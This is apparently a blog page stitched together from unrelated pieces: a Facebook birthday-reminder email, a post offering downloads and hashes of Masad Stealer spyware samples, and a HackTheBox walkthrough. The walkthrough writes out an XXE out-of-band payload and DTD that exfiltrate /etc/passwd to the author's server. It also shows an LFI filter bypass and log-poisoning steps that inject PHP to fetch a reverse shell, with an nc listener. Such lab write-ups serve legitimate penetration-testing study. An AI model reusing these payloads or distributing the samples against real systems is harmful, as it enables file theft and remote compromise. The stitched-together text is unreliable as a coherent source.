JA FUN STUFF BLOG

John A Ares

Wish Linda Federoff a happy birthday Monday, August 31, 2020 Linda Federoff Write on her timeline


		Facebook

Wish Linda Federoff a happy birthday

Monday, August 31, 2020

Linda Federoff

Write on her timeline

Plan an Event

This message was sent to john2706.funstuff@blogger.com. If you don't want to receive these emails from Facebook in the future, please unsubscribe.
Facebook, Inc., Attention: Community Support, 1 Facebook Way, Menlo Park, CA 94025

To help keep your account secure, please don't forward this email. Learn More

John A Ares

Reference

2019-09-25 Juniper. Masad Stealer: Exfiltrating using Telegram

"Masad Clipper and Stealer" steals browser information, computer files, and automatically replaces cryptocurrency wallets from the clipboard with its own.

It is written using Autoit scripts and then compiled into a Windows executable.
It uses Telegram to exfiltrate stolen information.

Download

Other malware

Download. Email me if you need the password (see in my profile)

Hashes

SHA256	SHA1	MD5
1acf5a461ee16336eb8bbf8d29982c7e26d5e11827c58ca01adac671a28b52ad	6001b34c17c122d201613fffd846b056614b66da	e03234c2259c474aeb69500423ddeed7
290a1b89517dec10bfd9938a0e86ae8c53b0c78ed7c60dc99e4f8e5837f4f24a	32800c10588053813f55bf8c87771311c5f7f38e	2df4c1cf093c8373a8f2f194e77b69a2
7937a1068f130a90b44781eea3351ba8a2776d0fede9699ba8b32f3198de045b	a2a67b06344e4f1cf85086f6b584316ec53d5e54	8368f1c4d8f0d908f5f4ff671df5f1da
87e44bca3cc360c64cc7449ec1dc26b7d1708441d471bf3d36cd330db3576294	2fe5483e6b82220eeeef12e531eb3347fea16ac1	1082ce517dd23eee335bedfc6bcd8205
cf97d52551a96dacb089ac41463d21cab2b004ba8c38ffc6cb5fb0958ddd34db	5b79a15cb61f5260f0b9d807faa160e6d49590e4	b5fdf9653eb1ffbdae8cb4f1f2d71747
79aa23c5a25c7cdbaba9c6c655c918dac3d9823ac62ebed9d7d3e94e1eaafc07	4a279a6b82fe801d3c8be9d16df2ef5623b17704	0029ab0fd56cd7e493b46a331ef18bd3
03d703f6d341be258ac3d95961ff0a67d4bf792f9e896530e193b091dca29c2e	a9740352af2c9cc926deba7dffc452f213f7f05f	a462aac76def5b53351b3b1ddb41124c
a368b6755e62e5c0ff79ea1e3bd146ee8a349af309b4acf0558a9c667e78293a	e16167ab646381c277c2ca84319ceb57bacb2c92	c4cdc7665adb1cda5897d4df4a560f88
ba933cefbe9a8034f0ba34e7d18481a7db7451c8ef4b6172fb0cad6db0513a51	00749407e97085af470c75ef004f2235d30af44f	c26a3f2317507a09d91014469b045384
3ba3c528d11d1df62a969a282e9e54534fb3845962672ad6d8bbc29cb6d062f5	b8100890c0f1894544b3f99168377ec46c38e911	4a0607b4488cd539b8b0b443abd121e3
b763054180cd4e24c0a78b49055ad36dbc849f1a096cddf2db8cee0b9338c21d	7bec99308ce4bf409417b642cd9432000a5c19d2	2dfb1d606e5539399aa1a536baafd2f8
d5ce4b04b7eec6530a4a9d40510177468fadc235253e5a74530a8c9d990f3c50	27fc204ffa42262b7570b6fccb435d4d38a3610f	c5d8b73da810646407c333fe52186281
965a5949d8f94e17ebcd4cb6d0a7c19f49facbfc1b1c74111e5ceb83550d6c8f	7698584b2e7c62061447a6a2583ed6957180c205	e7ebe4411664672359b393f530fc2fc1
44134b9d4b10d94f6381b446a1728b116d62e65c1a52db45235af12caf7e38c0	fd114077927d501606575ba9ab38ecfb3407d432	a4388980d7e3539d74a950dab23d00ac
848d76a227f4fe282b7ddfd82a6dfc4c25da2735a684462b42fe4e1c413d8e34	135cee7610890497183eb6251efef307ea013fe1	7bb23077b4f80df48b91b425eda05828
5ca0a957fe6c253827f344da4ba8692d77a4e21a1df4251594be2d27d87dd8ae	d231874332ca462fb462e4f68450d2c2c22d4bcd	dda77b3f3f74a2bdffd167917686e139
016fa511f6546ed439d2606c6db8821685a99f5a14ef3f710668b58dc89c6926	5c83749c62ee0131710bf26931cb1e463a8fbda3	b0c34df85677d8f752dc1e1a5eeba0c9
22be594fbfa878f631c0632f6c4d260b00918817ff66a1f9f15efe44c1a58460	856d635fca52631305f1fefc58eafa74496524b6	60ebf41953d5c6e212fc306cdb0c6519
f3571ec66288405dab43332ca03812617f85fb08832fbbe1f1d89901fe034b8a	819485e20d841195e2e8a7ae5b41ff709887bb21	6984d37863c08b9fdd969297d35d3538
04c949eca23103b1de05278b49f42c3ab6b06f4bf20aafa5f2faefaa84c16ecd	0487db2df1802dd4ee4ae3b62b5f08937dd5c77c	4366ee61cbd7e636aea8540836a60036
d6fc04acda8f33a6d35eb577c27754c2f2b4d6f4869576c7c4e11b2c5e9b0176	83ae89826114662dad8553d5eeed5217b57047f2	2bc964e294d7ab314c34e5934d91a5a9
18c0bd4dd98008383fc52045ad896449fa7f0037593bb730ed1ef88aa547006d	bcaa05b60a9d625852ac4f2d0d805ab164988155	35d9f08c39c4cf396427f3a345e5c09a
4c9d5469e9095813418260045c2b11e499e4eaa0ffb25293f90f580c464157df	4c6aacc0b893ed366f9f307326e59efa61e51534	50dddaf7e5bb24aabf66eecd0c8b79cf
0b5f1fbc05dc8baca492b748adeb01fb4904e02723b59211ecde222f7b12d91e	87f898e0d41c0f2c22d4e9278a942326877fc368	da780b72140535d4c2d391e76dc8181d
31ad5c4547ceae4d0550c8460524c16a6105afc056760e872c4966656256c9dc	37f485d3fa8f6cf13061cb1ea38ae0d5d2edfd95	134aefcf640c24a1ab5344a96150fb05
edb00a0e5ff70e899857549e3263c887a799416c8bbab43ab130ca1be9bbd78c	42c30dc551a3cb3bc935c0eae79b79f17942e439	c2722241f765d2ad4fb58edd76a4adea
96f852b81760a425befaa11ea37c0cdea2622630bf2a0c94bb95042211ab614d	5d9782064bc38d40c88f32c0410479cbd61caa40	f332cfcda8c0ef579ede59eff23caa1e
57fd171a5b1a88e9583b42439851a91a940eb31105ab29cb314846da2ed43b82	0bfec2059823b936d782bea7bc16abd9923dddb5	6fff82df7a565b4570d299486697310f
277018b2cc6226dca6c7678cac6718c8584f7231340ad8cd7c03477559fdf48b	261f916ce97ffc6817a4772705df68e6ccca8181	009dc7d8766a85d85bb6a26ee69b66fe
e968affb1fc7756deb0e29807a06681d09a0425990be76b31816795875469e3d	cf78484a999183324da9affdf2aaeff508d1dc47	3e1b8f6313447b8a4b49671ddeb8a4ee
4b1ccf6b823ee82e400ba25b1f532cd369d7e536475a470e2011b77ffeaf7bb3	bc988f7cd32d411f2a9888afc72c7a892e2a1def	55128a3da6f70129acdbf9dbe955cfe7
fc84d6636a34ad1a11dbaa1daec179e426bdcd9887b3d26dc06b202417c08f95	1df31bec02e35c9a4656bb3a3bdf631bb37605a8	55d77ab16377a8a314982f723fcc6fae
9ca15f15fbae58cb97b0d48a0248461e78e34e6d530338e3e5b91f209a166267	8505dfaad6d10b84c73544eb748d547cb5bad9bd	ebc12c530dab0a65c37ffd72612fa705
31f3a402c1662ed6adffbf2b1b65cf902d1df763698eb76d21e4e94b4c629714	18c972722d984ff6da2bc26a0aca4c7f209cc39c	05bbf6e72b5b24c0c81e0671bf17b1e7
8d9f124ddd69c257189f1e814bb9e3731c00926fc2371e6ebe2654f3950ca02e	553cd98c83e945ee3013aa40897baec0305b34a2	b4030025e039c54c2d3923057447494c
a0923d7645604faaa864a079adeb741a5d6e65507a2819b2fee4835d396077d9	f8e6995e28c789d8b24e982ac53d5d6ba453de73	b796f85c8a7de71407d6e3c4206edda3
a19b790ea12f785256510dde367d3313b5267536a58ca0c27dbdac7c693f57e1	a92f7393daf7ead9a44b12e35f850705798fc879	a6defec886d31f6375712466dd794a96
f030fb4e859ee6a97c50c973a73dced3640befe37f579cfd15367ce6a9bbede2	ad3a1e779f02539ccd07bff735e0823add9730b2	c259564a8fe72333604a5686e30f6242
f01db6d77ac21211992ceae4e66e1e03c1cb39d61e03645b9369f28252ca7693	14c6bf63ff4d32d8a0a42e81ea39304fb7ab13c8	80fe593ef5538fbf66b3b3e1cb7b9b8b
dfe3d0e95feaed685a784aed14d087b019ba2eb0274947a840d2bdbae4ae3674	2107d057478328df8f538102508de00b0c4b37c7	b5a85a0e7a2c4197c3794c8bb2eb5763
bf6083040ca51e83415f27c9412d9e3d700bd0841493b207bc96abf944ab0ca7	09a695ce6c35c029dd7577e29f403d7144698b41	7a2edceb31a9c0d05e5f13c6caee0576
b154151dc8ace5c57f109e6bb211a019db20c4f0127c4d13c7703f730bf49276	8c0cda049c85493df4e97db3db4ddc94075ba62c	b6a895ac5ba5b6472680d47410a238a5
6bf6b1bde63cee9b81902efd187fdd56ecee5853754ce0a19d5ab5c3b0242988	6e2d4f0bcc97ce130ae89647f648d3e96548a391	a29f9d176b913e7f693355700aaadbb9
0dcf547bd8f4074af97416d8b84ea64b2f3319064aa4bce64ad0c2e2d3957175	a996b925e9391a69140caf6e4adba928694ffe66	dd575413a40839f2807593aa21c71152
6cff1249cc45b61ce8d28d87f8edc6616447e38168e610bed142f0b9c46ea684	9baa823deb9075e8df77b891115c019244de09de	488bb5c0739485721182c01a82b01d14
5b5ebe019806885bbaafe37bc10ca09549e41c240b793fd29a70690a5d80b496	3d46711f9064b96ff2d0affdef1ecd82d120659d	b95e2d8a8509ac05f5445d18d32cc7cb
103d87098c9702cab7454b52869aeeb6a22919f29a7f19be7509255ce2d8c83e	e29a163488438c9ea9014ddf1a9b2d382cc5d7e6	baf2587fafaedbab4a78b9b7fd8b55f8
c73675005a09008bc91d6bc3b5ad59a630ab4670dca6ac0d926165a3ecfd8d92	d8ea2280cd06a5cc32b7d668e2b4b2e68f3a7e2a	98ecc6fbb2cb5649daf751fcbfb81bcb
ef623aadd50330342dc464a31b843b3d8b5767d62a62f5e515ac2b380b208fbe	620ff5a7aaf7f3fcf4abc9365e0e77b3ec4b434d	b14535c5835c9dfb3cbbc7f6fef6034c

Related articles

John A Ares

In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."

What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.

Extract the docx file.
Embed our payload in the extracted files.
Archive the file back in the docx format.
Upload the file on the server.

To extract the docx file we will use the unzip Linux command line tool.

mkdir doc
cd doc
unzip ../sample.docx

Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.

mkdir customXml
cd customXml
vim item1.xml

Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>">

What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.

zip -r sample.docx *

here -r means recursive and * means all files sample.docx is the output file.

Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.

Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:

python -m SimpleHTTPServer 8090

and then upload the file to the server and see if it works.

We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.

Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:

cat passwd.64 | base64 -d > passwd

looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:

http://10.10.10.173/getPatent_alphav1.0.php

We can use the id parameter to view the uploaded patents like this:

http://10.10.10.173/getPatent_alphav1.0.php?id=1

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:

http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file

http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log

As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.

Lets setup our reverse shell listener:

nc -lvnp 9999

and then perfrom a request to the target server with our php code like this:

curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>"

and lastly lets access the apache access.log file via the LFI on the target server:

http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3

Boom! we have a shell.

That's it for today's article see you next time.

References

OpenXML in word processing – Custom XML part – mapping flat data - https://blogs.sap.com/2017/04/24/openxml-in-word-processing-custom-xml-part-mapping-flat-data/
PayloadsAllTheThings - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#xxe-oob-with-dtd-and-php-filter
php-reverse-shell - https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

JA FUN STUFF BLOG

Monday, August 31, 2020

🎂 Let Linda Federoff know you are thinking of her on her birthday today!

Masad Clipper And Stealer - Windows Spyware Exfiltrating Data Via Telegram (Samples)

Sunday, August 30, 2020

XXE In Docx Files And LFI To RCE

XML External Entity Attack

LFI to RCE

References

More info